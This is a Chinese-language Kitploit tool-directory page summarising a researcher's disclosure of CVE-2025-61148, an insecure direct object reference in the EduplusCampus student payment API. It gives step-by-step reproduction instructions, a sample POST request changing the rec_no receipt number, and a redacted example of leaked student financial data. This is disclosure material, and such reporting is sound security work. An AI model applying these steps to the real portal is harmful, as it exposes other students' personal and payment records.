Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/sharma19d/cve-2025-61148
漏洞分析Web应用程序漏洞利用API安全测试信息收集渗透测试学习与教育
GitHubsharma19d/cve-2025-61148

CVE-2025-61148

该漏洞存在于学生支付API中。应用程序未能正确验证请求收据的用户是否有权查看。通过修改API请求中的rec_no参数,攻击者可以访问其他用户的收据。

查看仓库
49个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-61148

该漏洞存在于学生支付API中。应用程序未能正确验证请求收据的用户是否有权查看该收据。通过修改API请求中的rec_no参数,攻击者可以访问其他用户的收据。

CVE-2025-61148:EduplusCampus学生支付API中的IDOR漏洞

CVE ID: CVE-2025-61148 漏洞类型: 不安全的直接对象引用(IDOR) 受影响产品: EduplusCampus 受影响端点: /student/get-receipt 研究人员: Vinay Sharma

摘要

在EduplusCampus学生门户(版本3.0.1)中发现了一个严重的不安全的直接对象引用(IDOR)漏洞。该漏洞允许经过身份验证的用户通过修改API请求中的rec_no参数来访问其他学生的敏感个人和财务记录。

影响

成功利用该漏洞可使攻击者获取:

  • 姓名和学号
  • 支付金额和日期
  • 交易ID(TID)和银行详细信息
  • 个人身份信息(PII)

漏洞详情

应用程序未能正确验证请求支付收据的用户的授权。rec_no参数是顺序的或可猜测的,服务器会返回所请求编号的收据详情,而不检查该收据是否属于当前登录用户。

复现步骤

  1. 登录学生门户。
  2. 导航到收据生成部分。
  3. 拦截发送到 /student/get-receipt 的POST请求。
  4. 在JSON正文中找到 rec_no 参数。
  5. 将 rec_no 的值修改为另一个有效的收据编号(例如,将 PCUF-232025 改为 PCUF-231824)。
  6. 发送请求。
  7. 服务器返回与该收据编号关联的学生的个人和财务详细信息。
图片 图片

示例请求

root@kitploit:~
POST /student/get-receipt HTTP/1.1
Host: student.edupluscampus.com
Content-Type: application/json
Authorization: Bearer <token>

{
    "rec_no": "PCUF-233012"
}

### 泄露数据示例:
{
    "fullname": "REDACTED_NAME",
    "rollno": "CSE2019XXX",
    "component_total_amount": 55000.0,
    "trans_list": [
        {
            "date": "21-Oct-2024",
            "mode": "Online",
            "amount": 55000.0,
            "tid": "42951XXXX"
        }
    ]
}

厂商信息

  • 厂商: EduplusCampus
  • 产品: EduplusCampus学生门户 / 学生支付API

受影响版本

  • 版本: EduplusCampus 3.0.1

发现者

  • Vinay Sharma - 安全研究人员
下载工具